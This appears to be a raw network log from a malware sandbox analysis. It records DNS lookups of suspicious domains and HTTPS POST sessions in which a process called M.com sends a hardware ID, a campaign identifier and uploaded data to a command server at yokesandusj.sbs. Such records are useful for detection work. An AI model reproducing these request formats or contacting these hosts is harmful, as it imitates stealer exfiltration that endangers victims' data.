                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772315025 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772321939 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772361040 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772741079 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772763968 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772830963 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772836924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772862911 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.772869110 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773240089 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773260117 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773308039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773313999 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773339987 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773363113 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773751974 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773773909 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773813009 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773818970 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773849010 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.773869991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774596930 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774611950 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774655104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774656057 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774667978 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774688959 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774719954 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774727106 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774736881 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.774775982 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.778053999 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854325056 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854346991 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854463100 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854489088 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854526043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854832888 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854852915 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854902983 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854911089 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.854945898 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860871077 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860891104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860960007 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.860971928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861007929 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:17:00.861355066 CET44349927172.67.208.58192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 12:16:07.429919004 CET | 49581 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 12:16:07.439054012 CET | 53 | 49581 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 12:16:41.819010019 CET | 53828 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 12:16:41.833204031 CET | 53 | 53828 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 12:16:53.100218058 CET | 52234 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 12:16:53.157381058 CET | 53 | 52234 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 12:16:54.070966005 CET | 61995 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 12:16:54.083456993 CET | 53 | 61995 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 12:16:54.849848032 CET | 61572 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 12:16:54.858376026 CET | 53 | 61572 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 12:16:07.429919004 CET | 192.168.2.5 | 1.1.1.1 | 0x1e4a | Standard query (0) | iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:41.819010019 CET | 192.168.2.5 | 1.1.1.1 | 0x56da | Standard query (0) | yokesandusj.sbs | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:53.100218058 CET | 192.168.2.5 | 1.1.1.1 | 0xf8c | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:54.070966005 CET | 192.168.2.5 | 1.1.1.1 | 0x369f | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:54.849848032 CET | 192.168.2.5 | 1.1.1.1 | 0xe6dd | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 12:16:07.439054012 CET | 1.1.1.1 | 192.168.2.5 | 0x1e4a | Name error (3) | iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq | none | none | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:19.359612942 CET | 1.1.1.1 | 192.168.2.5 | 0xdbc0 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:41.833204031 CET | 1.1.1.1 | 192.168.2.5 | 0x56da | No error (0) | yokesandusj.sbs | | 104.21.44.159 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:41.833204031 CET | 1.1.1.1 | 192.168.2.5 | 0x56da | No error (0) | yokesandusj.sbs | | 172.67.201.44 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:53.157381058 CET | 1.1.1.1 | 192.168.2.5 | 0xf8c | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:54.083456993 CET | 1.1.1.1 | 192.168.2.5 | 0x369f | No error (0) | klipvumisui.shop | | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:54.083456993 CET | 1.1.1.1 | 192.168.2.5 | 0x369f | No error (0) | klipvumisui.shop | | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 12:16:54.858376026 CET | 1.1.1.1 | 192.168.2.5 | 0xe6dd | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                              • yokesandusj.sbs
                                                                                                                                                                                                                                                              • cegu.shop
                                                                                                                                                                                                                                                              • klipvumisui.shop
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.549842104.21.44.1594431532C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-06 11:16:42 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
2025-01-06 11:16:42 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
2025-01-06 11:16:42 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ktcl4s283t7j68vit4esspj68r; expires=Fri, 02 May 2025 05:03:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Ig4PtO9hOfJzKk3ZWUSiiua0uz%2FQJP59EIO8ckFG%2BybEFxYJ9yOlQJ4urP4RAQUxlgTVFrQIBB5KxbYwJExzjvPBUE%2BMhCX1m2rPoYFEn0H3lHl75GeDrrWh%2B6c88jNnus%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c253a2c41e1-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1686&rtt_var=651&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1656267&cwnd=243&unsent_bytes=0&cid=32153973a22194ac&ts=502&x=0"
2025-01-06 11:16:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
2025-01-06 11:16:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:43 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 78
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
2025-01-06 11:16:43 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2025-01-06 11:16:43 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=698d3174q97dk62tmf1c4ah1eu; expires=Fri, 02 May 2025 05:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMQdvgjYcu8lKmO6WxkrTiSznvCsM8MBzck0FlxUrqPbc7dF%2Bzuss9OJHao9hRqwMA3%2BNmoGxJM1u6ULarBxUDFDZPSN42hZaiMancPeA7CktyBYY4Sq%2FfVVOIFg9AAFf98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c2aefeec354-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1503&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=977&delivery_rate=1933774&cwnd=178&unsent_bytes=0&cid=ad80c07c311bb907&ts=478&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49853 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com

Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:44 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=45GPJ30OVSS5KLSQSA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12834
Host: yokesandusj.sbs
2025-01-06 11:16:44 UTC | 12834 | OUT | Data Ascii:
--45GPJ30OVSS5KLSQSA
Content-Disposition: form-data; name="hwid"

59AE76206C2B06176D75A801C764DBB8
--45GPJ30OVSS5KLSQSA
Content-Disposition: form-data; name="pid"

2
--45GPJ30OVSS5KLSQSA
Content-Disposition: form-data; name="lid"

hRjzG3--TRON
2025-01-06 11:16:45 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 11:16:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ehtsvb56571hp80sm9ev4jkpg4; expires=Fri, 02 May 2025 05:03:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxg%2FRojCdROoRtx4WTzo9KL9tXVEjSC2sfWq4WptvLOFTEqftFVQmp%2Fb5gbszMaOGFpNYaefPGzQQl55mf92DlKG6d8QiW59e97CkJAflyBXWwudY2dtEs%2FWFHbOPTUCfiw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdb4c327cba8c93-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=1839&rtt_var=1118&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13773&delivery_rate=821609&cwnd=192&unsent_bytes=0&cid=ea10fc7939fbd05d&ts=551&x=0"
2025-01-06 11:16:45 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-06 11:16:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49860 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com

Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:45 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UMB2YZ25PIS3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15040
Host: yokesandusj.sbs
2025-01-06 11:16:45 UTC | 15040 | OUT | Data Ascii:
--UMB2YZ25PIS3
Content-Disposition: form-data; name="hwid"

59AE76206C2B06176D75A801C764DBB8
--UMB2YZ25PIS3
Content-Disposition: form-data; name="pid"

2
--UMB2YZ25PIS3
Content-Disposition: form-data; name="lid"

hRjzG3--TRON
--UMB2YZ25PIS3
C
2025-01-06 11:16:46 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 11:16:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ave10g6rvnpn2fa1kl855ldjkj; expires=Fri, 02 May 2025 05:03:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YF6uX45IUIIjSK9j0ATgqUYVgVaxaFF8V9xiI%2BVJ24UNp8SEzuK%2FTt0kq42UQWgypTf84KHQIYDEGjMUTHTgvp8yT9rzmScjk6fylZYkxuEYvsysnzbxAwf2pvKVOx82J2U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdb4c3918cd7c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1833&rtt_var=702&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15973&delivery_rate=1593016&cwnd=173&unsent_bytes=0&cid=2bbe20a9043cb73a&ts=468&x=0"
2025-01-06 11:16:46 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-06 11:16:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49867 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com

Timestamp | Bytes transferred | Direction | Data
2025-01-06 11:16:46 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=NR43MFZ36ZVA6TH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20548
Host: yokesandusj.sbs
2025-01-06 11:16:46 UTC | 15331 | OUT | Data Ascii:
--NR43MFZ36ZVA6TH
Content-Disposition: form-data; name="hwid"

59AE76206C2B06176D75A801C764DBB8
--NR43MFZ36ZVA6TH
Content-Disposition: form-data; name="pid"

3
--NR43MFZ36ZVA6TH
Content-Disposition: form-data; name="lid"

hRjzG3--TRON
--NR43MF
2025-01-06 11:16:46 UTC | 5217 | OUT | Data: binary (non-ASCII) payload
2025-01-06 11:16:47 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 11:16:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p83ekns448euqrqerg13m9iafs; expires=Fri, 02 May 2025 05:03:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8chrwan%2B3fJJr0OvHkI%2B1%2BUn543EZ1%2B3p1ZETJ5okr3mFrqROY1W6VZ8jGFTrSuyRpOgRqf57AMsT%2BGYpPTtahj4qcBYyTwgAbmv6HTs8MV6zsXzp4fZrlcqwvRDZnuOQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fdb4c402cbf8ce3-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1805&rtt_var=710&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21506&delivery_rate=1617728&cwnd=252&unsent_bytes=0&cid=d890df5452665fcc&ts=605&x=0"
                                                                                                                                                                                                                                                              2025-01-06 11:16:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2025-01-06 11:16:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                              5 | 192.168.2.5 | 49877 | 104.21.44.159 | 443 | 1532 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=KOQNT3SGI296IF2QAE
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 7139
                                                                                                                                                                                                                                                              Host: yokesandusj.sbs
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC7139OUTData Raw: 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 41 45 37 36 32 30 36 43 32 42 30 36 31 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4f 51 4e 54 33 53 47 49 32 39 36 49 46 32 51 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d
                                                                                                                                                                                                                                                              Data Ascii: --KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="hwid"59AE76206C2B06176D75A801C764DBB8--KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="pid"1--KOQNT3SGI296IF2QAEContent-Disposition: form-data; name="lid"hRjzG3--TRON
                                                                                                                                                                                                                                                              2025-01-06 11:16:48 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 06 Jan 2025 11:16:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
